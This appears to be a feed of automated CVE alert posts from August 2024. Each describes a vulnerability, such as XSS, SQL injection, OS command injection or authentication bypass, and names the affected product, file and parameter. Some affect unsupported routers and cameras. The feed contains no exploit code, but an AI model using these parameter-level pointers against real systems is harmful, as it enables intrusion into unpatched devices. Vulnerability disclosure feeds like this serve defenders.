| 2024-08-07 01:37:30 |
🚨 CVE-2011-5182Cross-site scripting (XSS) vulnerability in lanoba-social-plugin/index.php in the Lanoba Social plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the action parameter. NOTE: the vendor disputes this issue, stating "Lanoba's plug in does sanitize user input, and because that input is never sent to the browser, an attacker has no way of executing script or code on a user's behalf.🎖@cveNotify |
|
| 2024-08-07 01:37:26 |
🚨 CVE-2011-4899wp-admin/setup-config.php in the installation component in WordPress 3.3.1 and earlier does not ensure that the specified MySQL database service is appropriate, which allows remote attackers to configure an arbitrary database via the dbhost and dbname parameters, and subsequently conduct static code injection and cross-site scripting (XSS) attacks via (1) an HTTP request or (2) a MySQL query. NOTE: the vendor disputes the significance of this issue; however, remote code execution makes the issue important in many realistic environments🎖@cveNotify |
|
| 2024-08-07 01:37:25 |
🚨 CVE-2011-4766The Site Editor (aka SiteBuilder) feature in Parallels Plesk Small Business Panel 10.2.0 allows remote attackers to obtain ASP source code via a direct request to wysiwyg/fckconfig.js. NOTE: CVE disputes this issue because ASP is only used in a JavaScript comment🎖@cveNotify |
|
| 2024-08-07 01:37:24 |
🚨 CVE-2010-0158SQL injection vulnerability in the JoomlaBamboo (JB) Simpla Admin template for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in an article action to the com_content component, reachable through index.php. NOTE: the vendor disputes this report, saying: "JoomlaBamboo has investigated this report, and it is incorrect. There is no SQL injection vulnerability involving the id parameter in an article view, and there never was. JoomlaBamboo customers have no reason to be concerned about this report.🎖@cveNotify |
|
| 2024-08-07 00:37:39 |
🚨 CVE-2011-4451libs/Wakka.class.php in WikkaWiki 1.3.1 and 1.3.2, when the spam_logging option is enabled, allows remote attackers to write arbitrary PHP code to the spamlog_path file via the User-Agent HTTP header in an addcomment request. NOTE: the vendor disputes this issue because the rendering of the spamlog_path file never uses the PHP interpreter🎖@cveNotify |
|
| 2024-08-07 00:37:38 |
🚨 CVE-2011-3640Untrusted search path vulnerability in Mozilla Network Security Services (NSS), as used in Google Chrome before 17 on Windows and Mac OS X, might allow local users to gain privileges via a Trojan horse pkcs11.txt file in a top-level directory. NOTE: the vendor's response was "Strange behavior, but we're not treating this as a security bug."🎖@cveNotify |
|
| 2024-08-06 23:37:25 |
🚨 CVE-2011-1473OpenSSL before 0.9.8l, and 0.9.8m through 1.x, does not properly restrict client-initiated renegotiation within the SSL and TLS protocols, which might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection, a different vulnerability than CVE-2011-5094. NOTE: it can also be argued that it is the responsibility of server deployments, not a security library, to prevent or limit renegotiation when it is inappropriate within a specific environment🎖@cveNotify |
|
| 2024-08-06 23:37:24 |
🚨 CVE-2011-1652The default configuration of Microsoft Windows 7 immediately prefers a new IPv6 and DHCPv6 service over a currently used IPv4 and DHCPv4 service upon receipt of an IPv6 Router Advertisement (RA), and does not provide an option to ignore an unexpected RA, which allows remote attackers to conduct man-in-the-middle attacks on communication with external IPv4 servers via vectors involving RAs, a DHCPv6 server, and NAT-PT on the local network, aka a "SLAAC Attack." NOTE: it can be argued that preferring IPv6 complies with RFC 3484, and that attempting to determine the legitimacy of an RA is currently outside the scope of recommended behavior of host operating systems🎖@cveNotify |
|
| 2024-08-06 22:37:32 |
🚨 CVE-2024-38206An authenticated attacker can bypass Server-Side Request Forgery (SSRF) protection in Microsoft Copilot Studio to leak sensitive information over a network.🎖@cveNotify |
|
| 2024-08-06 22:37:25 |
🚨 CVE-2011-0737Adobe ColdFusion 9.0.1 CHF1 and earlier allows remote attackers to obtain sensitive information via an id=- query to a .cfm file, which reveals the installation path in an error message. NOTE: the vendor disputes the significance of this issue because the Site-wide Error Handler and Debug Output Settings sections of the ColdFusion Lockdown guide explain the requirement for settings that prevent this information disclosure🎖@cveNotify |
|
| 2024-08-06 22:37:24 |
🚨 CVE-2011-0736Adobe ColdFusion 9.0.1 CHF1 and earlier, when a web application is configured to use a DBMS, allows remote attackers to obtain potentially sensitive information about the database structure via an id=- query to a .cfm file. NOTE: the vendor disputes the significance of this issue because the Site-wide Error Handler and Debug Output Settings sections of the ColdFusion Lockdown guide explain the requirement for settings that prevent this information disclosure🎖@cveNotify |
|
| 2024-08-06 21:37:32 |
🚨 CVE-2012-5383Untrusted search path vulnerability in the installation functionality in Oracle MySQL 5.5.28, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the "C:\MySQL\MySQL Server 5.5\bin" directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the MySQL installation🎖@cveNotify |
|
| 2024-08-06 21:37:25 |
🚨 CVE-2012-5379Untrusted search path vulnerability in the installation functionality in ActivePython 3.2.2.3, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\Python27 or C:\Python27\Scripts directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the ActivePython installation🎖@cveNotify |
|
| 2024-08-06 21:37:24 |
🚨 CVE-2012-4875Heap-based buffer overflow in gdevwpr2.c in Ghostscript 9.04, when processing the OutputFile device parameter, allows user-assisted remote attackers to execute arbitrary code via a long file name in a PostScript document. NOTE: as of 20120314, the developer was not able to reproduce the issue and disputed it🎖@cveNotify |
|
| 2024-08-06 20:37:42 |
🚨 CVE-2024-42397Multiple unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the AP Certificate Management daemon accessed via the PAPI protocol. Successful exploitation of these vulnerabilities results in the ability to interrupt the normal operation of the affected Access Point.🎖@cveNotify |
|
| 2024-08-06 20:37:41 |
🚨 CVE-2024-42394There are vulnerabilities in the Soft AP Daemon Service which could allow a threat actor to execute an unauthenticated RCE attack. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2024-08-06 20:37:37 |
🚨 CVE-2024-41667OpenAM is an open access management solution. In versions 15.0.3 and prior, the `getCustomLoginUrlTemplate` method in RealmOAuth2ProviderSettings.java is vulnerable to template injection due to its usage of user input. Although the developer intended to implement a custom URL for handling login to override the default OpenAM login, they did not restrict the `CustomLoginUrlTemplate`, allowing it to be set freely. Commit fcb8432aa77d5b2e147624fe954cb150c568e0b8 introduces `TemplateClassResolver.SAFER_RESOLVER` to disable the resolution of commonly exploited classes in FreeMarker template injection. As of time of publication, this fix is expected to be part of version 15.0.4.🎖@cveNotify |
|
| 2024-08-06 20:37:36 |
🚨 CVE-2020-22657In Ruckus R310 10.5.1.0.199, Ruckus R500 10.5.1.0.199, Ruckus R600 10.5.1.0.199, Ruckus T300 10.5.1.0.199, Ruckus T301n 10.5.1.0.199, Ruckus T301s 10.5.1.0.199, SmartCell Gateway 200 (SCG200) before 3.6.2.0.795, SmartZone 100 (SZ-100) before 3.6.2.0.795, SmartZone 300 (SZ300) before 3.6.2.0.795, Virtual SmartZone (vSZ) before 3.6.2.0.795, ZoneDirector 1100 9.10.2.0.130, ZoneDirector 1200 10.2.1.0.218, ZoneDirector 3000 10.2.1.0.218, ZoneDirector 5000 10.0.1.0.151, a vulnerability allows attackers to perform WEB GUI login authentication bypass.🎖@cveNotify |
|
| 2024-08-06 20:37:35 |
🚨 CVE-2020-22656In Ruckus R310 10.5.1.0.199, Ruckus R500 10.5.1.0.199, Ruckus R600 10.5.1.0.199, Ruckus T300 10.5.1.0.199, Ruckus T301n 10.5.1.0.199, Ruckus T301s 10.5.1.0.199, SmartCell Gateway 200 (SCG200) before 3.6.2.0.795, SmartZone 100 (SZ-100) before 3.6.2.0.795, SmartZone 300 (SZ300) before 3.6.2.0.795, Virtual SmartZone (vSZ) before 3.6.2.0.795, ZoneDirector 1100 9.10.2.0.130, ZoneDirector 1200 10.2.1.0.218, ZoneDirector 3000 10.2.1.0.218, ZoneDirector 5000 10.0.1.0.151, a vulnerability allows attackers to make the Secure Boot in failed attempts state (rfwd).🎖@cveNotify |
|
| 2024-08-06 20:37:31 |
🚨 CVE-2020-22654In Ruckus R310 10.5.1.0.199, Ruckus R500 10.5.1.0.199, Ruckus R600 10.5.1.0.199, Ruckus T300 10.5.1.0.199, Ruckus T301n 10.5.1.0.199, Ruckus T301s 10.5.1.0.199, SmartCell Gateway 200 (SCG200) before 3.6.2.0.795, SmartZone 100 (SZ-100) before 3.6.2.0.795, SmartZone 300 (SZ300) before 3.6.2.0.795, Virtual SmartZone (vSZ) before 3.6.2.0.795, ZoneDirector 1100 9.10.2.0.130, ZoneDirector 1200 10.2.1.0.218, ZoneDirector 3000 10.2.1.0.218, ZoneDirector 5000 10.0.1.0.151, a vulnerability allows attackers to bypass firmware image bad md5 checksum failed error.🎖@cveNotify |
|
| 2024-08-06 20:37:30 |
🚨 CVE-2012-2658Buffer overflow in the SQLDriverConnect function in unixODBC 2.3.1 allows local users to cause a denial of service (crash) via a long string in the DRIVER option. NOTE: this issue might not be a vulnerability, since the ability to set this option typically implies that the attacker already has legitimate access to cause a DoS or execute code, and therefore the issue would not cross privilege boundaries. There may be limited attack scenarios if isql command-line options are exposed to an attacker, although it seems likely that other, more serious issues would also be exposed, and this issue might not cross privilege boundaries in that context.🎖@cveNotify |
|
| 2024-08-06 20:37:29 |
🚨 CVE-2012-2657Buffer overflow in the SQLDriverConnect function in unixODBC 2.0.10, 2.3.1, and earlier allows local users to cause a denial of service (crash) via a long string in the FILEDSN option. NOTE: this issue might not be a vulnerability, since the ability to set this option typically implies that the attacker already has legitimate access to cause a DoS or execute code, and therefore the issue would not cross privilege boundaries. There may be limited attack scenarios if isql command-line options are exposed to an attacker, although it seems likely that other, more serious issues would also be exposed, and this issue might not cross privilege boundaries in that context.🎖@cveNotify |
|
| 2024-08-06 20:37:26 |
🚨 CVE-2012-2128Cross-site request forgery (CSRF) vulnerability in doku.php in DokuWiki 2012-01-25 Angua allows remote attackers to hijack the authentication of administrators for requests that add arbitrary users. NOTE: this issue has been disputed by the vendor, who states that it is resultant from CVE-2012-2129: "the exploit code simply uses the XSS hole to extract a valid CSRF token."🎖@cveNotify |
|
| 2024-08-06 20:37:25 |
🚨 CVE-2012-2213Squid 3.1.9 allows remote attackers to bypass the access configuration for the CONNECT method by providing an arbitrary allowed hostname in the Host HTTP header. NOTE: this issue might not be reproducible, because the researcher is unable to provide a squid.conf file for a vulnerable system, and the observed behavior is consistent with a squid.conf file that was (perhaps inadvertently) designed to allow access based on a "req_header Host" acl regex that matches www.uol.com.br🎖@cveNotify |
|
| 2024-08-06 20:37:24 |
🚨 CVE-2012-2212McAfee Web Gateway 7.0 allows remote attackers to bypass the access configuration for the CONNECT method by providing an arbitrary allowed hostname in the Host HTTP header. NOTE: this issue might not be reproducible, because the researcher did not provide configuration details for the vulnerable system, and the observed behavior might be consistent with a configuration that was (perhaps inadvertently) designed to allow access based on Host HTTP headers🎖@cveNotify |
|
| 2024-08-06 19:37:32 |
🚨 CVE-2024-2209A user with administrative privileges can create a compromised dll file of the same name as the original dll within the HP printer’s Firmware Update Utility (FUU) bundle and place it in the Microsoft Windows default downloads directory which can lead to potential arbitrary code execution.🎖@cveNotify |
|
| 2024-08-06 19:37:26 |
🚨 CVE-2024-2628Inappropriate implementation in Downloads in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to perform UI spoofing via a crafted URL. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-08-06 19:37:25 |
🚨 CVE-2012-0693submitticket.php in WHMCompleteSolution (WHMCS) 5.03 allows remote attackers to inject arbitrary code into a subject field via crafted ticket data, a different vulnerability than CVE-2011-5061. NOTE: the vendor disputes this issue, noting that some of the details overlap CVE-2011-5061, but that it "says it affects V5.0.3, and the submitticket.php file, both of which are wrong.🎖@cveNotify |
|
| 2024-08-06 19:37:24 |
🚨 CVE-2012-0394The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself.🎖@cveNotify |
|
| 2024-08-06 18:37:32 |
🚨 CVE-2024-24336A multiple Cross-site scripting (XSS) vulnerability in the '/members/moremember.pl', and ‘/members/members-home.pl’ endpoints within Koha Library Management System version 23.05.05 and earlier allows malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and ‘Patrons Restriction’ components.🎖@cveNotify |
|
| 2024-08-06 18:37:26 |
🚨 CVE-2013-6276QNAP F_VioCard 2312 and F_VioGate 2308 have hardcoded entries in authorized_keys files. NOTE: 1. All active models are not affected. The last affected model was EOL since 2010. 2. The legacy authorization mechanism is no longer adopted in all active models🎖@cveNotify |
|
| 2024-08-06 18:37:25 |
🚨 CVE-2013-6357Cross-site request forgery (CSRF) vulnerability in the Manager application in Apache Tomcat 5.5.25 and earlier allows remote attackers to hijack the authentication of administrators for requests that manipulate application deployment via the POST method, as demonstrated by a /manager/html/undeploy?path= URI. NOTE: the vendor disputes the significance of this report, stating that "the Apache Tomcat Security team has not accepted any reports of CSRF attacks against the Manager application ... as they require a reckless system administrator.🎖@cveNotify |
|
| 2024-08-06 18:37:24 |
🚨 CVE-2012-0039GLib 2.31.8 and earlier, when the g_str_hash function is used, computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table. NOTE: this issue may be disputed by the vendor; the existence of the g_str_hash function is not a vulnerability in the library, because callers of g_hash_table_new and g_hash_table_new_full can specify an arbitrary hash function that is appropriate for the application.🎖@cveNotify |
|
| 2024-08-06 18:07:26 |
🚨 CVE-2024-7443** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical has been found in Vivotek IB8367A VVTK-0100b. Affected is the function getenv of the file upload_file.cgi. The manipulation of the argument QUERY_STRING leads to command injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-273528. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the affected release tree is end-of-life.🎖@cveNotify |
|
| 2024-08-06 18:07:25 |
🚨 CVE-2024-7440** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Vivotek CC8160 VVTK-0100d. It has been classified as critical. This affects the function getenv of the file upload_file.cgi. The manipulation of the argument QUERY_STRING leads to command injection. It is possible to initiate the attack remotely. The identifier VDB-273525 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the affected release tree is end-of-life.🎖@cveNotify |
|
| 2024-08-06 18:07:24 |
🚨 CVE-2024-7439** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Vivotek CC8160 VVTK-0100d and classified as critical. Affected by this issue is the function read of the component httpd. The manipulation of the argument Content-Length leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273524. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the affected release tree is end-of-life.🎖@cveNotify |
|
| 2024-08-06 17:37:42 |
🚨 CVE-2024-39229An issue in GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, XE3000/X3000 v4, and B2200/MV1000/MV1000W/USB150/N300/SF1200 v3.216 allows attackers to intercept communications via a man-in-the-middle attack when DDNS clients are reporting data to the server.🎖@cveNotify |
|
| 2024-08-06 17:37:41 |
🚨 CVE-2024-6995Inappropriate implementation in Fullscreen in Google Chrome on Android prior to 127.0.6533.72 allowed a remote attacker who convinced a user to engage in specific UI gestures to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-08-06 17:37:40 |
🚨 CVE-2024-7470A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. It has been rated as critical. This issue affects the function sslvpn_config_mod of the file /vpn/vpn_template_style.php of the component Web Interface. The manipulation of the argument template/stylenum leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273563. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-06 17:37:37 |
🚨 CVE-2024-7469A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. It has been declared as critical. This vulnerability affects the function sslvpn_config_mod of the file /vpn/list_vpn_web_custom.php of the component Web Interface. The manipulation of the argument template/stylenum leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273562 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-06 17:37:36 |
🚨 CVE-2024-7467A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 and classified as critical. Affected by this issue is the function sslvpn_config_mod of the file /vpn/list_ip_network.php of the component Web Interface. The manipulation of the argument template/stylenum leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273560. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-06 17:37:35 |
🚨 CVE-2024-7460A vulnerability was found in OSWAPP Warehouse Inventory System 1.0/2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /change_password.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273553 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-06 17:37:31 |
🚨 CVE-2024-7458A vulnerability was found in elunez eladmin up to 2.7 and classified as critical. This issue affects some unknown processing of the file /api/deploy/upload /api/database/upload of the component Database Management/Deployment Management. The manipulation of the argument file leads to path traversal: 'dir/../../filename'. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273551.🎖@cveNotify |
|
| 2024-08-06 17:37:30 |
🚨 CVE-2023-48901A SQL injection vulnerability in tramyardg Autoexpress version 1.3.0, allows remote unauthenticated attackers to execute arbitrary SQL commands via the parameter "id" within the getPhotosByCarId function call in details.php.🎖@cveNotify |
|
| 2024-08-06 17:37:29 |
🚨 CVE-2023-46967Cross Site Scripting vulnerability in the sanitize function in Enhancesoft osTicket 1.18.0 allows a remote attacker to escalate privileges via a crafted support ticket.🎖@cveNotify |
|
| 2024-08-06 17:07:24 |
🚨 CVE-2024-28164SAP NetWeaver AS Java (CAF - Guided Procedures)allows an unauthenticated user to access non-sensitive information about theserver which would otherwise be restricted causing low impact onconfidentiality of the application.🎖@cveNotify |
|
| 2024-08-06 16:37:26 |
🚨 CVE-2013-2185The readObject method in the DiskFileItem class in Apache Tomcat and JBoss Web, as used in Red Hat JBoss Enterprise Application Platform 6.1.0 and Red Hat JBoss Portal 6.0.0, allows remote attackers to write to arbitrary files via a NULL byte in a file name in a serialized instance, a similar issue to CVE-2013-2186. NOTE: this issue is reportedly disputed by the Apache Tomcat team, although Red Hat considers it a vulnerability. The dispute appears to regard whether it is the responsibility of applications to avoid providing untrusted data to be deserialized, or whether this class should inherently protect against this issue🎖@cveNotify |
|
| 2024-08-06 16:37:25 |
🚨 CVE-2013-2763The Schneider Electric M340 PLC modules allow remote attackers to cause a denial of service (resource consumption) via unspecified vectors. NOTE: the vendor reportedly disputes this issue because it "could not be duplicated" and "an attacker could not remotely exploit this observed behavior to deny PLC control functions.🎖@cveNotify |
|
| 2024-08-06 16:07:24 |
🚨 CVE-2024-29954A vulnerability in a password management API in Brocade Fabric OS versions before v9.2.1, v9.2.0b, v9.1.1d, and v8.2.3e prints sensitive information in log files. This could allow an authenticated user to view the server passwords for protocols such as scp and sftp.Detail.When the firmwaredownload command is incorrectly entered or points to an erroneous file, the firmware download log captures the failed command, including any password entered in the command line.🎖@cveNotify |
|
| 2024-08-06 15:37:38 |
🚨 CVE-2024-33844The 'control' in Parrot ANAFI USA firmware 1.10.4 does not check the MAV_MISSION_TYPE(0, 1, 2, 255), which allows attacker to cut off the connection between a controller and the drone by sending MAVLink MISSION_COUNT command with a wrong MAV_MISSION_TYPE.🎖@cveNotify |
|
| 2024-08-06 15:37:37 |
🚨 CVE-2024-28335Lektor before 3.3.11 does not sanitize DB path traversal. Thus, shell commands might be executed via a file that is added to the templates directory, if the victim's web browser accesses an untrusted website that uses JavaScript to send requests to localhost port 5000, and the web browser is running on the same machine as the "lektor server" command.🎖@cveNotify |
|
| 2024-08-06 15:37:36 |
🚨 CVE-2023-45927S-Lang 2.3.2 was discovered to contain an arithmetic exception via the function tt_sprintf().🎖@cveNotify |
|
| 2024-08-06 15:37:32 |
🚨 CVE-2024-29684DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/makehtml_homepage.php allowing a remote attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-08-06 15:37:31 |
🚨 CVE-2024-22724An issue was discovered in osCommerce v4, allows local attackers to bypass file upload restrictions and execute arbitrary code via administrator profile photo upload feature.🎖@cveNotify |
|
| 2024-08-06 15:37:30 |
🚨 CVE-2024-2053The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the "www-data" user.🎖@cveNotify |
|
| 2024-08-06 15:37:26 |
🚨 CVE-2024-27564A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.🎖@cveNotify |
|
| 2024-08-06 15:37:25 |
🚨 CVE-2024-20005In da, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08355599; Issue ID: ALPS08355599.🎖@cveNotify |
|
| 2024-08-06 15:37:24 |
🚨 CVE-2013-0346Apache Tomcat 7.x uses world-readable permissions for the log directory and its files, which might allow local users to obtain sensitive information by reading a file. NOTE: One Tomcat distributor has stated "The tomcat log directory does not contain any sensitive information."🎖@cveNotify |
|
| 2024-08-06 15:07:24 |
🚨 CVE-2024-5745A vulnerability was found in itsourcecode Bakery Online Ordering System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/modules/product/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-267414 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-06 14:07:30 |
🚨 CVE-2024-7212A vulnerability, which was classified as critical, has been found in TOTOLINK A7000R 9.1.0u.6268_B20220504. This issue affects the function loginauth of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument password leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272783. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-06 14:07:26 |
🚨 CVE-2024-37347There is a cross-site scripting vulnerability in the poolconfiguration component of the management UI of Absolute Secure Access prior to13.06. Attackers with system administrator permissions can pass a limitedlength script to be run by another administrator. The scope is unchanged, thereis no loss of confidentiality. Impact to system integrity is high, impact tosystem availability is none.🎖@cveNotify |
|
| 2024-08-06 14:07:25 |
🚨 CVE-2024-37343There is a cross-site scripting vulnerability in the SecureAccess administrative console of Absolute Secure Access prior to version 13.06.Attackers with valid tunnel credentials can pass a limited-length script to theadministrative console which is then temporarily stored where an administratorusing a non-default configuration could click on it while the attacker has avalid tunnel session with the server. The scope is unchanged, there is no lossof confidentiality. Impact to system availability is none, impact to systemintegrity is high.🎖@cveNotify |
|
| 2024-08-06 14:07:24 |
🚨 CVE-2023-6696The Popup Builder – Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 4.3.1. While some functions contain a nonce check, the nonce can be obtained from the profile page of a logged-in user. This allows subscribers to perform several actions including deleting subscribers and perform blind Server-Side Request Forgery.🎖@cveNotify |
|
| 2024-08-06 13:37:43 |
🚨 CVE-2024-33992Cross-Site Scripting (XSS) vulnerability in School Event Management System affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in it through the 'view' parameter in '/student/index.php'.🎖@cveNotify |
|
| 2024-08-06 13:37:42 |
🚨 CVE-2024-33990Cross-Site Scripting (XSS) vulnerability in School Event Management System affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted javascript payload to an authenticated user and partially take over their browser session via the 'id' and 'view' parameters in '/user/index.php'.🎖@cveNotify |
|
| 2024-08-06 13:37:41 |
🚨 CVE-2024-33989Cross-Site Scripting (XSS) vulnerability in School Event Management System affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted javascript payload to an authenticated user and partially take over their browser session via the 'eventdate' and 'events' parameters in 'port/event_print.php'.🎖@cveNotify |
|
| 2024-08-06 13:37:38 |
🚨 CVE-2024-33988Cross-Site Scripting (XSS) vulnerability in School Attendance Monitoring System and School Event Management System affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain details of their session cookie via the 'Attendance', 'attenddate' and 'YearLevel' parameters in '/report/attendance_print.php'.🎖@cveNotify |
|
| 2024-08-06 13:37:37 |
🚨 CVE-2024-33986Cross-Site Scripting (XSS) vulnerability in School Attendance Monitoring System and School Event Management System affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain details of their session cookie via the 'View' parameter in '/department/index.php'.🎖@cveNotify |
|
| 2024-08-06 13:37:36 |
🚨 CVE-2024-33984Cross-Site Scripting (XSS) vulnerability in School Attendance Monitoring System and School Event Management System affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain details of their session cookie via the 'Attendance', 'attenddate' and 'YearLevel' parameters in '/AttendanceMonitoring/report/index.php'.🎖@cveNotify |
|
| 2024-08-06 13:37:32 |
🚨 CVE-2024-33983Cross-Site Scripting (XSS) vulnerability in School Attendance Monitoring System and School Event Management System affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain details of their session cookie via the 'Attendance', 'attenddate' and 'YearLevel' parameters in '/AttendanceMonitoring/report/attendance_print.php'.🎖@cveNotify |
|
| 2024-08-06 13:37:31 |
🚨 CVE-2024-38856Incorrect Authorization vulnerability in Apache OFBiz.This issue affects Apache OFBiz: through 18.12.14.Users are recommended to upgrade to version 18.12.15, which fixes the issue.Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).🎖@cveNotify |
|
| 2024-08-06 13:07:26 |
🚨 CVE-2024-7175A vulnerability has been found in TOTOLINK A3600R 4.1.2cu.5182_B20201102 and classified as critical. This vulnerability affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ipDoamin leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272596. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-06 13:07:25 |
🚨 CVE-2024-7172A vulnerability classified as critical was found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. Affected by this vulnerability is the function getSaveConfig of the file /cgi-bin/cstecgi.cgi?action=save&setting. The manipulation of the argument http_host leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272593 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-06 13:07:24 |
🚨 CVE-2024-41685This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to missing HTTPOnly flag for the session cookies associated with the router's web management interface. An attacker with remote access could exploit this by intercepting transmission within an HTTP session on the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to capture cookies and obtain sensitive information on the targeted system.🎖@cveNotify |
|
| 2024-08-06 12:37:42 |
🚨 CVE-2024-33974SQL injection vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in it through the following 'Users in '/report/printlogs.php' parameter.🎖@cveNotify |
|
| 2024-08-06 12:37:41 |
🚨 CVE-2024-33971SQL injection vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in it through the following 'username' in '/login.php' parameter.🎖@cveNotify |
|
| 2024-08-06 12:37:36 |
🚨 CVE-2024-33969SQL injection vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in it through the following 'id' in '/AttendanceMonitoring/department/index.php' parameter.🎖@cveNotify |
|
| 2024-08-06 12:37:35 |
🚨 CVE-2024-33966SQL injection vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in it through the following 'xtsearch' in '/admin/mod_reports/index.php' parameter.🎖@cveNotify |
|
| 2024-08-06 12:37:31 |
